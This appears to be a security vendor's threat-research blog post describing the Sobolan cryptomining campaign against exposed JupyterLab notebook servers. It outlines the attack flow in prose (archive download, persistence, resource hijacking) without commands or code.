Stopping Sobolan Malware with Aqua Runtime Protection

Stopping Sobolan Malware with Aqua Runtime Protection The Attacked Workload Mapping the Attack Flow Detailed Summary of the Blocked Events Summary Indications of Compromise (IOCs) Aqua Nautilus researchers have discovered a new attack campaign targeting interactive computing environments such as Jupyter Notebooks. The attack consists of multiple stages, beginning with the download of a compressed file from a remote server. Once executed, the attacker deploys several malicious tools to exploit the server and establish persistence. This campaign poses a significant risk to cloud-native environments, as it enables unauthorized access and long-term control over compromised systems. Jupyter Notebooks In this blog, we will outline the attack stages, discuss the potential risks, and provide recommendations to strengthen security and prevent exploitation. Interactive Computing Environments or Notebook Interfaces are platforms designed for data scientists and programmers to write, execute, and analyze code interactively. There are many products available, including Jupyter Notebook , JupyterLab , Apache Zeppelin , Google Colab , Databricks Notebooks , and others. These environments are often connected to the internet and require authentication to access data or execute code. However, a simple misconfiguration can sometimes expose the server to malicious activity by hackers. Jupyter Notebook JupyterLab Apache Zeppelin Google Colab Databricks Notebooks Figure 1: Sobolan campaign attack flow The attackers gained initial access through an unauthenticated JupyterLab instance, allowing them to deploy malware and cryptominers. They first downloaded and extracted a compressed archive containing 13 malicious files, consisting of both binaries and shell scripts. Once executed, these scripts initiated multiple processes to establish persistence, hijack system resources for cryptomining, and evade detection (as shown in Figure 1).